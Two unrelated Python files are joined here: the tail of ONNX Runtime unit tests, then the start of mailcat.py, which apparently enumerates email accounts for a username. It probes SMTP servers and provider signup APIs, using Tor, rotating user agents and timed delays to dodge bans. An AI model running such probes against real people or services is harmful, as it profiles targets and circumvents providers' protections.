self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
def testLoadingSessionOptionsFromModel(self):
try:
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(1)
sess = onnxrt.InferenceSession(get_name("model_with_valid_ort_config_json.onnx"))
session_options = sess.get_session_options()
self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config
self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config
self.assertEqual(session_options.execution_mode,
onnxrt.ExecutionMode.ORT_SEQUENTIAL) # default option (not from the ORT config)
self.assertEqual(session_options.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) # from the ORT config
self.assertEqual(session_options.enable_profiling, True) # from the ORT config
except Exception:
raise
finally:
# Make sure the usage of the feature is disabled after this test
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(0)
def testSessionOptionsAddFreeDimensionOverrideByDenotation(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_denotation("DATA_BATCH", 3)
so.add_free_dimension_override_by_denotation("DATA_CHANNEL", 5)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# Free dims with denotations - "DATA_BATCH" and "DATA_CHANNEL" have values assigned to them.
self.assertEqual(input_shape, [3, 5, 5])
def testSessionOptionsAddFreeDimensionOverrideByName(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_name("Dim1", 4)
so.add_free_dimension_override_by_name("Dim2", 6)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# "Dim1" and "Dim2" have values assigned to them.
self.assertEqual(input_shape, [4, 6, 5])
def testSessionOptionsAddConfigEntry(self):
so = onnxrt.SessionOptions()
key = "CONFIG_KEY"
val = "CONFIG_VAL"
so.add_session_config_entry(key, val)
self.assertEqual(so.get_session_config_entry(key), val)
def testInvalidSessionOptionsConfigEntry(self):
so = onnxrt.SessionOptions()
invalide_key = "INVALID_KEY"
with self.assertRaises(RuntimeError) as context:
so.get_session_config_entry(invalide_key)
self.assertTrue(
'SessionOptions does not have configuration with key: ' + invalide_key in str(context.exception))
def testSessionOptionsAddInitializer(self):
# Create an initializer and add it to a SessionOptions instance
so = onnxrt.SessionOptions()
# This initializer is different from the actual initializer in the model for "W"
ortvalue_initializer = onnxrt.OrtValue.ortvalue_from_numpy(np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32))
# The user should manage the life cycle of this OrtValue and should keep it in scope
# as long as any session that is going to be reliant on it is in scope
so.add_initializer("W", ortvalue_initializer)
# Create an InferenceSession that only uses the CPU EP and validate that it uses the
# initializer provided via the SessionOptions instance (overriding the model initializer)
# We only use the CPU EP because the initializer we created is on CPU and we want the model to use that
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), so, ['CPUExecutionProvider'])
res = sess.run(["Y"], {"X": np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)})
self.assertTrue(np.array_equal(res[0], np.array([[2.0, 2.0], [12.0, 12.0], [30.0, 30.0]], dtype=np.float32)))
def testRegisterCustomOpsLibrary(self):
if sys.platform.startswith("win"):
shared_library = 'custom_op_library.dll'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
elif sys.platform.startswith("darwin"):
shared_library = 'libcustom_op_library.dylib'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
else:
shared_library = './libcustom_op_library.so'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_op_library", "custom_op_test.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
so1 = onnxrt.SessionOptions()
so1.register_custom_ops_library(shared_library)
# Model loading successfully indicates that the custom op node could be resolved successfully
sess1 = onnxrt.InferenceSession(custom_op_model, so1)
#Run with input data
input_name_0 = sess1.get_inputs()[0].name
input_name_1 = sess1.get_inputs()[1].name
output_name = sess1.get_outputs()[0].name
input_0 = np.ones((3,5)).astype(np.float32)
input_1 = np.zeros((3,5)).astype(np.float32)
res = sess1.run([output_name], {input_name_0: input_0, input_name_1: input_1})
output_expected = np.ones((3,5)).astype(np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
# Create an alias of SessionOptions instance
# We will use this alias to construct another InferenceSession
so2 = so1
# Model loading successfully indicates that the custom op node could be resolved successfully
sess2 = onnxrt.InferenceSession(custom_op_model, so2)
# Create another SessionOptions instance with the same shared library referenced
so3 = onnxrt.SessionOptions()
so3.register_custom_ops_library(shared_library)
sess3 = onnxrt.InferenceSession(custom_op_model, so3)
def testOrtValue(self):
numpy_arr_input = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
numpy_arr_output = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
def test_session_with_ortvalue_input(ortvalue):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
res = sess.run(["Y"], {"X": ortvalue})
self.assertTrue(np.array_equal(res[0], numpy_arr_output))
ortvalue1 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input)
self.assertEqual(ortvalue1.device_name(), "cpu")
self.assertEqual(ortvalue1.shape(), [3, 2])
self.assertEqual(ortvalue1.data_type(), "tensor(float)")
self.assertEqual(ortvalue1.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue1)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
ortvalue2 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input, 'cuda', 0)
self.assertEqual(ortvalue2.device_name(), "cuda")
self.assertEqual(ortvalue2.shape(), [3, 2])
self.assertEqual(ortvalue2.data_type(), "tensor(float)")
self.assertEqual(ortvalue2.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue2)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
def testRunModelWithCudaCopyStream(self):
available_providers = onnxrt.get_available_providers()
if (not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelWithCudaCopyStream when CUDA is not available")
else:
# adapted from issue #4829 for a race condition when copy is not on default stream
# note:
# 1. if there are intermittent failure in this test, something is wrong
# 2. it's easier to repro on slower GPU (like M60, Geforce 1070)
# to repro #4829, set the CUDA EP do_copy_in_default_stream option to False
providers = [("CUDAExecutionProvider", {"do_copy_in_default_stream": True}), "CPUExecutionProvider"]
session = onnxrt.InferenceSession(get_name("issue4829.onnx"), providers=providers)
shape = np.array([2,2], dtype=np.int64)
for iteration in range(100000):
result = session.run(output_names=['output'], input_feed={'shape': shape})
def testSharedAllocatorUsingCreateAndRegisterAllocator(self):
# Create and register an arena based allocator
# ort_arena_cfg = onnxrt.OrtArenaCfg(0, -1, -1, -1) (create an OrtArenaCfg like this template if you want to use non-default parameters)
ort_memory_info = onnxrt.OrtMemoryInfo("Cpu", onnxrt.OrtAllocatorType.ORT_ARENA_ALLOCATOR, 0, onnxrt.OrtMemType.DEFAULT)
# Use this option if using non-default OrtArenaCfg : onnxrt.create_and_register_allocator(ort_memory_info, ort_arena_cfg)
onnxrt.create_and_register_allocator(ort_memory_info, None)
# Create a session that will use the registered arena based allocator
so1 = onnxrt.SessionOptions()
so1.log_severity_level = 1
so1.add_session_config_entry("session.use_env_allocators", "1")
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so1)
# Create a session that will NOT use the registered arena based allocator
so2 = onnxrt.SessionOptions()
so2.log_severity_level = 1
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so2)
def testCheckAndNormalizeProviderArgs(self):
from onnxruntime.capi.onnxruntime_inference_collection import check_and_normalize_provider_args
valid_providers = ["a", "b", "c"]
def check_success(providers, provider_options, expected_providers, expected_provider_options):
actual_providers, actual_provider_options = check_and_normalize_provider_args(
providers, provider_options, valid_providers)
self.assertEqual(actual_providers, expected_providers)
self.assertEqual(actual_provider_options, expected_provider_options)
check_success(None, None, [], [])
check_success(["a"], None, ["a"], [{}])
check_success(["a", "b"], None, ["a", "b"], [{}, {}])
check_success([("a", {1: 2}), "b"], None, ["a", "b"], [{"1": "2"}, {}])
check_success(["a", "b"], [{1: 2}, {}], ["a", "b"], [{"1": "2"}, {}])
with self.assertWarns(UserWarning):
check_success(["a", "b", "a"], [{"x": 1}, {}, {"y": 2}], ["a", "b"], [{"x": "1"}, {}])
def check_failure(providers, provider_options):
with self.assertRaises(ValueError):
check_and_normalize_provider_args(providers, provider_options, valid_providers)
# disable this test
# provider not valid
#check_failure(["d"], None)
# providers not sequence
check_failure(3, None)
# providers value invalid
check_failure([3], None)
# provider_options not sequence
check_failure(["a"], 3)
# provider_options value invalid
check_failure(["a"], ["not dict"])
# providers and provider_options length mismatch
check_failure(["a", "b"], [{1: 2}])
# provider options unsupported mixed specification
check_failure([("a", {1: 2})], [{3: 4}])
def testRegisterCustomEPsLibrary(self):
# exclude for macos and linux
if not sys.platform.startswith("win"):
return
# Exclude for training
training_enabled = False
try:
from onnxruntime.capi.ort_trainer import ORTTrainer
training_enabled = True
except:
pass
if training_enabled:
return
shared_library = 'test_execution_provider.dll'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_execution_provider_library", "test_model.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
from onnxruntime.capi import _pybind_state as C
session_options = C.get_default_session_options()
sess = C.InferenceSession(session_options, custom_op_model, True, True)
sess.initialize_session(['my_ep'],
[{'shared_lib_path': shared_library,
'device_id':'1', 'some_config':'val'}],
set())
print("Create session with customize execution provider successfully!")
if __name__ == '__main__':
unittest.main()
|
mailcat.py
|
#!/usr/bin/python3
import argparse
import base64
import datetime
import json
import random
import smtplib
import string as s
import sys
import threading
from time import sleep
from typing import Dict, List
import dns.resolver
import requests
from requests_html import HTMLSession # type: ignore
def randstr(num):
return ''.join(random.sample((s.ascii_lowercase + s.ascii_uppercase + s.digits), num))
def sleeper(sList, s_min, s_max):
for ind in sList:
if sList.index(ind) < (len(sList) - 1):
# print("less", sList.index(ind))
sleep(random.uniform(s_min, s_max))
def via_tor():
session = requests.Session()
session.proxies = {'http': 'socks5://127.0.0.1:9050',
'https': 'socks5://127.0.0.1:9050'}
return session
def simple_session():
return requests.Session()
def code250(mailProvider, target):
providerLst = []
randPref = ''.join(random.sample(s.ascii_lowercase, 6))
fromAddress = "{}@{}".format(randPref, mailProvider)
targetMail = "{}@{}".format(target, mailProvider)
records = dns.resolver.Resolver().resolve(mailProvider, 'MX')
mxRecord = records[0].exchange
mxRecord = str(mxRecord)
try:
server = smtplib.SMTP()
server.set_debuglevel(0)
server.connect(mxRecord)
server.helo(server.local_hostname)
server.mail(fromAddress)
code, message = server.rcpt(targetMail)
if code == 250:
providerLst.append(targetMail)
return providerLst
except Exception as e:
pass
return []
def gmail(target, req_session_fun) -> Dict:
result = {}
gmailChkLst = code250("gmail.com", target)
if gmailChkLst:
result["Google"] = gmailChkLst[0]
return result
def yandex(target, req_session_fun) -> Dict:
result = {}
yaAliasesLst = ["yandex.by",
"yandex.kz",
"yandex.ua",
"yandex.com",
"ya.ru"]
yaChkLst = code250("yandex.ru", target)
if yaChkLst:
yaAliasesLst = ['{}@{}'.format(target, yaAlias) for yaAlias in yaAliasesLst]
yaMails = list(set(yaChkLst + yaAliasesLst))
result["Yandex"] = yaMails
return result
def proton(target, req_session_fun) -> Dict:
result = {}
'''
protonMails = []
protonDomainsLst = ["protonmail.com",
"protonmail.ch",
"pm.me"]
for ProtonDomain in protonDomainsLst:
protonChk = code250(ProtonDomain, target)
if protonChk and protonChk is not None:
protonMails += protonChk
sleep(random.uniform(2, 4))
if protonMails:
print('\n'.join(["[+] Success with {}".format(protonMail) for protonMail in protonMails]))
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36'}
protonLst = ["protonmail.com", "protonmail.ch", "pm.me"]
protonSucc = []
sreq = req_session_fun()
for proton_domain in protonLst:
proton_mail = "{}@{}".format(target, proton_domain)
# check_prot_mail = requests.get("https://api.protonmail.ch/pks/lookup?op=get&search={}".format(proton_mail), headers=headers)
check_prot_mail = sreq.get("https://api.protonmail.ch/pks/lookup?op=get&search={}".format(proton_mail),
headers=headers, timeout=5)
if check_prot_mail.text != "No key found":
protonSucc.append(proton_mail)'''
protonLst = ["protonmail.com", "protonmail.ch", "pm.me"]
protonSucc = []
sreq = req_session_fun()
protonURL = "https://mail.protonmail.com/api/users/available?Name={}".format(target)
headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Accept": "application/vnd.protonmail.v1+json",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Referer": "https://mail.protonmail.com/create/new?language=en",
"x-pm-appversion": "Web_3.16.19",
"x-pm-apiversion": "3",
"Cache-Control": "no-cache",
"Pragma": "no-cache",
"DNT": "1", "Connection": "close"}
try:
chkProton = sreq.get(protonURL, headers=headers, timeout=3)
if chkProton.status_code == 409:
chkProton = chkProton.json()
exists = chkProton['Error']
if exists == "Username already used":
protonSucc = ["{}@{}".format(target, protodomain) for protodomain in protonLst]
except Exception as e:
#print(e)
pass
if protonSucc:
result["Proton"] = protonSucc
return result
def mailRu(target, req_session_fun) -> Dict:
result = {}
# headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0', 'Referer': 'https://account.mail.ru/signup?from=main&rf=auth.mail.ru'}
mailRU = ["mail.ru", "bk.ru", "inbox.ru", "list.ru", "internet.ru"]
mailRuSucc = []
sreq = req_session_fun()
for maildomain in mailRU:
try:
headers = {'User-Agent': random.choice(uaLst)}
mailruMail = "{}@{}".format(target, maildomain)
data = {'email': mailruMail}
# chkMailRU = requests.post('https://account.mail.ru/api/v1/user/exists', headers=headers, data=data)
chkMailRU = sreq.post('https://account.mail.ru/api/v1/user/exists', headers=headers, data=data, timeout=5)
if chkMailRU.status_code == 200:
exists = chkMailRU.json()['body']['exists']
if exists:
mailRuSucc.append(mailruMail)
except Exception as e:
pass
sleep(random.uniform(0.5, 2))
if mailRuSucc:
result["MailRU"] = mailRuSucc
return result
def rambler(target, req_session_fun) -> Dict: # ban risk
result = {}
ramblerMail = ["rambler.ru", "lenta.ru", "autorambler.ru", "myrambler.ru", "ro.ru", "rambler.ua"]
ramblerSucc = []
sreq = req_session_fun()
for maildomain in ramblerMail:
try:
targetMail = "{}@{}".format(target, maildomain)
# reqID = ''.join(random.sample((s.ascii_lowercase + s.ascii_uppercase + s.digits), 20))
reqID = randstr(20)
userAgent = random.choice(uaLst)
ramblerChkURL = "https://id.rambler.ru:443/jsonrpc"
# "Referer": "https://id.rambler.ru/login-20/mail-registration?back=https%3A%2F%2Fmail.rambler.ru%2F&rname=mail¶m=embed&iframeOrigin=https%3A%2F%2Fmail.rambler.ru",
headers = {"User-Agent": userAgent,
"Referer": "https://id.rambler.ru/login-20/mail-registration?utm_source=head"
"&utm_campaign=self_promo&utm_medium=header&utm_content=mail&rname=mail"
"&back=https%3A%2F%2Fmail.rambler.ru%2F%3Futm_source%3Dhead%26utm_campaign%3Dself_promo%26utm_medium%3Dheader%26utm_content%3Dmail"
"¶m=embed&iframeOrigin=https%3A%2F%2Fmail.rambler.ru&theme=mail-web",
"Content-Type": "application/json",
"Origin": "https://id.rambler.ru",
"X-Client-Request-Id": reqID}
ramblerJSON = {"method": "Rambler::Id::login_available", "params": [{"login": targetMail}], "rpc": "2.0"}
# ramblerChk = requests.post(ramblerChkURL, headers=headers, json=ramblerJSON)
ramblerChk = sreq.post(ramblerChkURL, headers=headers, json=ramblerJSON, timeout=5)
if ramblerChk.status_code == 200:
try:
exist = ramblerChk.json()['result']['profile']['status']
if exist == "exist":
ramblerSucc.append(targetMail)
# print("[+] Success with {}".format(targetMail))
# else:
# print("[-]".format(ramblerChk.text))
except KeyError as e:
pass
# print(e)
sleep(random.uniform(4, 6)) # don't reduce
except Exception as e:
pass
if ramblerSucc:
result["Rambler"] = ramblerSucc
return result
def tuta(target, req_session_fun) -> Dict:
result = {}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'}
tutaMail = ["tutanota.com", "tutanota.de", "tutamail.com", "tuta.io", "keemail.me"]
tutaSucc = []
sreq = req_session_fun()
for maildomain in tutaMail:
try:
targetMail = "{}@{}".format(target, maildomain)
tutaURL = "https://mail.tutanota.com/rest/sys/mailaddressavailabilityservice?_body="
tutaCheck = sreq.get(
'{}%7B%22_format%22%3A%220%22%2C%22mailAddress%22%3A%22{}%40{}%22%7D'.format(tutaURL, target,
maildomain),
headers=headers, timeout=5)
if tutaCheck.status_code == 200:
exists = tutaCheck.json()['available']
if exists == "0":
tutaSucc.append(targetMail)
sleep(random.uniform(2, 4))
except Exception as e:
pass
if tutaSucc:
result["Tutanota"] = tutaSucc
return result
def yahoo(target, req_session_fun) -> Dict:
result = {}
yahooURL = "https://login.yahoo.com:443/account/module/create?validateField=yid"
yahooCookies = {"B": "10kh9jteu3edn&b=3&s=66", "AS": "v=1&s=wy5fFM96"} # 13 8
# yahooCookies = {"B": "{}&b=3&s=66".format(randstr(13)), "AS": "v=1&s={}".format(randstr(8))} # 13 8
headers = {"User-Agent": random.choice(uaLst),
"Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate",
"Referer": "https://login.yahoo.com/account/create?.src=ym&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd&authMechanism=primary&specId=yidReg",
"content-type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest",
"DNT": "1", "Connection": "close"}
# yahooPOST = {"specId": "yidReg", "crumb": randstr(11), "acrumb": randstr(8), "yid": target} # crumb: 11, acrumb: 8
yahooPOST = {"specId": "yidReg", "crumb": "bshN8x9qmfJ", "acrumb": "wy5fFM96", "yid": target}
sreq = req_session_fun()
try:
yahooChk = sreq.post(yahooURL, headers=headers, cookies=yahooCookies, data=yahooPOST, timeout=5)
if '"IDENTIFIER_EXISTS"' in yahooChk.text:
result["Yahoo"] = "{}@yahoo.com".format(target)
except Exception as e:
pass
return result
def outlook(target, req_session_fun) -> Dict:
result = {}
liveSucc = []
_sreq = HTMLSession()
headers = {"User-Agent": random.choice(uaLst)}
liveLst = ["outlook.com", "hotmail.com"]
url_template = 'https://signup.live.com/?username={}@{}&uaid=f746d3527c20414d8c86fd7f96613d85&lic=1'
for maildomain in liveLst:
try:
liveChk = _sreq.get(url_template.format(target, maildomain), headers=headers)
liveChk.html.render(sleep=10)
if "suggLink" in liveChk.html.html:
liveSucc.append("{}@{}".format(target, maildomain))
except Exception as e:
pass
if liveSucc:
result["Live"] = liveSucc
return result
def zoho(target, req_session_fun) -> Dict:
result = {}
headers = {
"User-Agent": "User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36",
"Referer": "https://www.zoho.com/",
"Origin": "https://www.zoho.com"
}
zohoURL = "https://accounts.zoho.com:443/accounts/validate/register.ac"
zohoPOST = {"username": target, "servicename": "VirtualOffice", "serviceurl": "/"}
sreq = req_session_fun()
try:
zohoChk = sreq.post(zohoURL, headers=headers, data=zohoPOST, timeout=10)
if zohoChk.status_code == 200:
# if "IAM.ERROR.USERNAME.NOT.AVAILABLE" in zohoChk.text:
# print("[+] Success with {}@zohomail.com".format(target))
if zohoChk.json()['error']['username'] == 'This username is taken':
result["Zoho"] = "{}@zohomail.com".format(target)
# print("[+] Success with {}@zohomail.com".format(target))
except Exception as e:
pass
return result
def lycos(target, req_session_fun) -> Dict:
result = {}
lycosURL = "https://registration.lycos.com/usernameassistant.php?validate=1&m_AID=0&t=1625674151843&m_U={}&m_PR=27&m_SESSIONKEY=4kCL5VaODOZ5M5lBF2lgVONl7tveoX8RKmedGRU3XjV3xRX5MqCP2NWHKynX4YL4".format(
target)
headers = {
"User-Agent": "User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36",
"Referer": "https://registration.lycos.com/register.php?m_PR=27&m_E=7za1N6E_h_nNSmIgtfuaBdmGpbS66MYX7lMDD-k9qlZCyq53gFjU_N12yVxL01F0R_mmNdhfpwSN6Kq6bNfiqQAA",
"X-Requested-With": "XMLHttpRequest"}
sreq = req_session_fun()
try:
# lycosChk = requests.get(lycosURL, headers=headers)
lycosChk = sreq.get(lycosURL, headers=headers, timeout=10)
if lycosChk.status_code == 200:
if lycosChk.text == "Unavailable":
result["Lycos"] = "{}@lycos.com".format(target)
except Exception as e:
pass
return result
def eclipso(target, req_session_fun) -> Dict:  # high ban risk; false positives after a ban
result = {}
eclipsoSucc = []
eclipsoLst = ["eclipso.eu",
"eclipso.de",
"eclipso.at",
"eclipso.ch",
"eclipso.be",
"eclipso.es",
"eclipso.it",
"eclipso.me",
"eclipso.nl",
"eclipso.email"]
headers = {'User-Agent': random.choice(uaLst),
'Referer': 'https://www.eclipso.eu/signup/tariff-5',
'X-Requested-With': 'XMLHttpRequest'}
sreq = req_session_fun()
for maildomain in eclipsoLst:
try:
targetMail = "{}@{}".format(target, maildomain)
eclipsoURL = "https://www.eclipso.eu/index.php?action=checkAddressAvailability&address={}".format(
targetMail)
chkEclipso = sreq.get(eclipsoURL, headers=headers, timeout=5)
if chkEclipso.status_code == 200:
if '>0<' in chkEclipso.text:
eclipsoSucc.append(targetMail)
except Exception as e:
pass
sleep(random.uniform(2, 4))
if eclipsoSucc:
result["Eclipso"] = eclipsoSucc
return result
def posteo(target, req_session_fun) -> Dict:
result = {}
posteoLst = [
"posteo.af",
"posteo.at",
"posteo.be",
"posteo.ca",
"posteo.ch",
"posteo.cl",
"posteo.co",
"posteo.co.uk",
"posteo.com.br",
"posteo.cr",
"posteo.cz",
"posteo.de",
"posteo.dk",
"posteo.ee",
"posteo.es",
"posteo.eu",
"posteo.fi",
"posteo.gl",
"posteo.gr",
"posteo.hn",
"posteo.hr",
"posteo.hu",
"posteo.ie",
"posteo.in",
"posteo.is",
"posteo.it",
"posteo.jp",
"posteo.la",
"posteo.li",
"posteo.lt",
"posteo.lu",
"posteo.me",
"posteo.mx",
"posteo.my",
"posteo.net",
"posteo.nl",
"posteo.no",
"posteo.nz",
"posteo.org",
"posteo.pe",
"posteo.pl",
"posteo.pm",
"posteo.pt",
"posteo.ro",
"posteo.ru",
"posteo.se",
"posteo.sg",
"posteo.si",
"posteo.tn",
"posteo.uk",
"posteo.us"]
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
'Referer': 'https://posteo.de/en/signup',
'X-Requested-With': 'XMLHttpRequest'}
sreq = req_session_fun()
try:
eclipsoURL = "https://posteo.de/users/new/check_username?user%5Busername%5D={}".format(target)
chkEclipso = sreq.get(eclipsoURL, headers=headers, timeout=5)
if chkEclipso.status_code == 200:
if chkEclipso.text == "false":
result["Posteo"] = ["{}@posteo.net".format(target),
"~50 aliases: https://posteo.de/en/help/which-domains-are-available-to-use-as-a-posteo-alias-address"]
except Exception as e:
pass
return result
def mailbox(target, req_session_fun) -> Dict: # tor RU
result = {}
mailboxURL = "https://register.mailbox.org:443/ajax"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36"}
mailboxJSON = {"account_name": target, "action": "validateAccountName"}
existiert = "Der Accountname existiert bereits."
sreq = req_session_fun()
try:
chkMailbox = sreq.post(mailboxURL, headers=headers, json=mailboxJSON, timeout=10)
if chkMailbox.text == existiert:
result["MailBox"] = "{}@mailbox.org".format(target)
# print("[+] Success with {}@mailbox.org".format(target))
except Exception as e:
# print(e)
pass
return result
def firemail(target, req_session_fun) -> Dict: # tor RU
result = {}
firemailSucc = []
firemailDomains = ["firemail.at", "firemail.de", "firemail.eu"]
headers = {'User-Agent': random.choice(uaLst),
'Referer': 'https://firemail.de/E-Mail-Adresse-anmelden',
'X-Requested-With': 'XMLHttpRequest'}
sreq = req_session_fun()
for firemailDomain in firemailDomains:
try:
targetMail = "{}@{}".format(target, firemailDomain)
firemailURL = "https://firemail.de/index.php?action=checkAddressAvailability&address={}".format(targetMail)
chkFiremail = sreq.get(firemailURL, headers=headers, timeout=10)
if chkFiremail.status_code == 200:
if '>0<' in chkFiremail.text:
firemailSucc.append("{}".format(targetMail))
except Exception as e:
pass
sleep(random.uniform(2, 4))
if firemailSucc:
result["Firemail"] = firemailSucc
return result
def fastmail(target, req_session_fun) -> Dict:  # sanctions against Russia; use TOR; the full domain loop takes ~4 min
result = {}
fastmailSucc = []
fastmailLst = [
"fastmail.com", "fastmail.cn", "fastmail.co.uk", "fastmail.com.au",
"fastmail.de", "fastmail.es", "fastmail.fm", "fastmail.fr",
"fastmail.im", "fastmail.in", "fastmail.jp", "fastmail.mx",
"fastmail.net", "fastmail.nl", "fastmail.org", "fastmail.se",
"fastmail.to", "fastmail.tw", "fastmail.uk", "fastmail.us",
"123mail.org", "airpost.net", "eml.cc", "fmail.co.uk",
"fmgirl.com", "fmguy.com", "mailbolt.com", "mailcan.com",
"mailhaven.com", "mailmight.com", "ml1.net", "mm.st",
"myfastmail.com", "proinbox.com", "promessage.com", "rushpost.com",
"sent.as", "sent.at", "sent.com", "speedymail.org",
"warpmail.net", "xsmail.com", "150mail.com", "150ml.com",
"16mail.com", "2-mail.com", "4email.net", "50mail.com",
"allmail.net", "bestmail.us", "cluemail.com", "elitemail.org",
"emailcorner.net", "emailengine.net", "emailengine.org", "emailgroups.net",
"emailplus.org", "emailuser.net", "f-m.fm", "fast-email.com",
"fast-mail.org", "fastem.com", "fastemail.us", "fastemailer.com",
"fastest.cc", "fastimap.com", "fastmailbox.net", "fastmessaging.com",
"fea.st", "fmailbox.com", "ftml.net", "h-mail.us",
"hailmail.net", "imap-mail.com", "imap.cc", "imapmail.org",
"inoutbox.com", "internet-e-mail.com", "internet-mail.org",
"internetemails.net", "internetmailing.net", "jetemail.net",
"justemail.net", "letterboxes.org", "mail-central.com", "mail-page.com",
"mailandftp.com", "mailas.com", "mailc.net", "mailforce.net",
"mailftp.com", "mailingaddress.org", "mailite.com", "mailnew.com",
"mailsent.net", "mailservice.ms", "mailup.net", "mailworks.org",
"mymacmail.com", "nospammail.net", "ownmail.net", "petml.com",
"postinbox.com", "postpro.net", "realemail.net", "reallyfast.biz",
"reallyfast.info", "speedpost.net", "ssl-mail.com", "swift-mail.com",
"the-fastest.net", "the-quickest.com", "theinternetemail.com",
"veryfast.biz", "veryspeedy.net", "yepmail.net", "your-mail.com"]
headers = {"User-Agent": random.choice(uaLst),
"Referer": "https://www.fastmail.com/signup/",
"Content-type": "application/json",
"X-TrustedClient": "Yes",
"Origin": "https://www.fastmail.com"}
fastmailURL = "https://www.fastmail.com:443/jmap/setup/"
sreq = req_session_fun()
for fmdomain in fastmailLst:
# print(fastmailLst.index(fmdomain)+1, fmdomain)
fmmail = "{}@{}".format(target, fmdomain)
fastmailJSON = {"methodCalls": [["Signup/getEmailAvailability", {"email": fmmail}, "0"]],
"using": ["https://www.fastmail.com/dev/signup"]}
try:
chkFastmail = sreq.post(fastmailURL, headers=headers, json=fastmailJSON, timeout=5)
if chkFastmail.status_code == 200:
try:
fmJson = chkFastmail.json()['methodResponses'][0][1]['isAvailable']
if fmJson is False:
fastmailSucc.append("{}".format(fmmail))
# print('\n'.join(["[+] Success with {}@{}".format(target, posteod) for posteod in posteoLst]))
except Exception as e:
pass
# print(e)
except Exception as e:
pass
# print(e)
sleep(random.uniform(0.5, 1.1))
if fastmailSucc:
result["Fastmail"] = fastmailSucc
return result
def startmail(target, req_session_fun) -> Dict: # TOR
result = {}
startmailURL = "https://mail.startmail.com:443/api/AvailableAddresses/{}%40startmail.com".format(target)
headers = {"User-Agent": random.choice(uaLst),
"X-Requested-With": "1.94.0"}
sreq = req_session_fun()
try:
chkStartmail = sreq.get(startmailURL, headers=headers, timeout=10)
if chkStartmail.status_code == 404:
result["StartMail"] = "{}@startmail.com".format(target)
except Exception as e:
pass
return result
def kolab(target, req_session_fun) -> Dict:
result: Dict[str, List] = {}
kolabLst = ["mykolab.com",
"attorneymail.ch",
"barmail.ch",
"collaborative.li",
"diplomail.ch",
"freedommail.ch",
"groupoffice.ch",
